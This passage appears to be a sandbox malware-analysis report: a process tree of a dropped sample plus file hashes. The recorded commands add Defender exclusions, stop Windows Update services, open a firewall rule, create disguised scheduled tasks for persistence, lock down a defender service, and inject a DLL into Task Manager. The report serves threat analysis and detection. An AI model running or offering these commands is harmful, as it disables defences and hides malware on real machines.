-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 11405⤵
- Program crash
PID:3992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 14565⤵
- Program crash
PID:2124
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit5⤵PID:4128
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f6⤵
- Kills process with taskkill
PID:2680
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 14085⤵
- Program crash
PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2636
-
-
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4500
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:2072
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1284
-
-
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"4⤵
- Executes dropped EXE
PID:2200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3552
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3984
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:5104
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
PID:2524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3556
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:3224
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:3040
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3276
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
PID:3816
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Executes dropped EXE
- Creates scheduled task(s)
PID:1104
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵PID:4416
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵PID:3964
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
PID:1388
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4768 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:1672
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:1496
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4508
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4532
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3848
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1672
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4348
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4268
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:868
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3032
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4220
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2144
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1492
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3256
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2652
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3568
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4076
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4056
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1980
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4188
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1944
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:868
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2684
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:3948
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4100
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3516
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3492
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2216
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4828
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4756
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4940
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4452
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2176
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4904
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:992
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5104
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2940
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1564
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3376
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1856
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2032
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3004
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4912
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:812
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2600
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3292
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:396
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4764
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2580
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 2772 -ip 27721⤵PID:1716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2772 -ip 27721⤵PID:60
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 27721⤵PID:2528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2772 -ip 27721⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵
- Executes dropped EXE
PID:220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2772 -ip 27721⤵PID:3492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2772 -ip 27721⤵PID:3848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 27721⤵PID:5096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2772 -ip 27721⤵PID:4556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2772 -ip 27721⤵PID:4132
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:5092
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵PID:1104
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:1772
-
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exeC:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe1⤵PID:1900
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD567345b374ece01694478cd821081caf8
SHA104b3bacfe792cfaffb935ecd2b80813b3306b67b
SHA2565a4a3f6ae9d338ce1639c47779eca19a0e827445e529d6fcf7753e670bf8b4f1
SHA512fe0c99e9731d3601e701e2bb7c8e542654447822a61c251e0124a1b9643f6264600f45ca8010c6150c9cef6903321f3769fa77008334f7a3c92e0026f83d6853
-
Filesize
522B
MD58334a471a4b492ece225b471b8ad2fc8
SHA11cb24640f32d23e8f7800bd0511b7b9c3011d992
SHA2565612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169
SHA51256ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD59bc110200117a3752313ca2acaf8a9e1
SHA1fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA5121f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb
-
Filesize
944B
MD59bc110200117a3752313ca2acaf8a9e1
SHA1fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
SHA256c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
SHA5121f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb
-
Filesize
1KB
MD59c260eec9480ce84b15f1f374765472f
SHA1878893212a4afba68936571299d72d3f368947c4
SHA2568156da2387bc5c58ca7c32cca44c6d2dbe61fb2a7ea73be6f0673c270521296c
SHA512a8334295234a90fb816633c0f01ccfaaaa70c64f52be466ff3c9086d2642f40ae7f71e229125c6a61de1c632c844b8c822dd956bc84967cee8dd1bdc672c5db2
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
726KB
MD58670305fdaf49dc2fd18804bc8000bd2
SHA1a1b57601e426f1c12a25251012c7ef2f3d1181e2
SHA256f40cc09e6969d91062935094b84e5530ff17b140606f222e14755150688a5a34
SHA5129c4dc8036c8e85870d78f6c1cfe4176c62baf4e8bc6a0dc76eb217eb2a62aae6bac60a836ba7a8bdb1143d6ab889460ac140fa652450829a86f93048147735d1
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
10.3MB
MD5ebf830587e4df50f0a886fe4bf05bda0
SHA13c0217098ca7b191d146b770eb366a9081187a66
SHA256e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074
-
Filesize
362KB
MD52d257873ee0ae75c9b89bd340e3e3da6
SHA19dd9080df32b375f39df6470136a5bb107829eba
SHA256f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753
-
Filesize
362KB
MD52d257873ee0ae75c9b89bd340e3e3da6
SHA19dd9080df32b375f39df6470136a5bb107829eba
SHA256f6cf800d44ff24fc1d1c06ccb0df605c5585f56fd041d335a5fe15628a1e9428
SHA512e89156f93c1ddb1292d31477e4d05937fc3a091a9868842f5cf861b9bea3c521c839cc557a8dcab0e3d651561b2d06392fcc9426278cd7797c2abeb6f5df5753
-
Filesize
362KB
MD52d257873ee0ae75c9b89bd340e3e3da6
SHA19dd9080df32b375f39df6470136a5bb107829eba
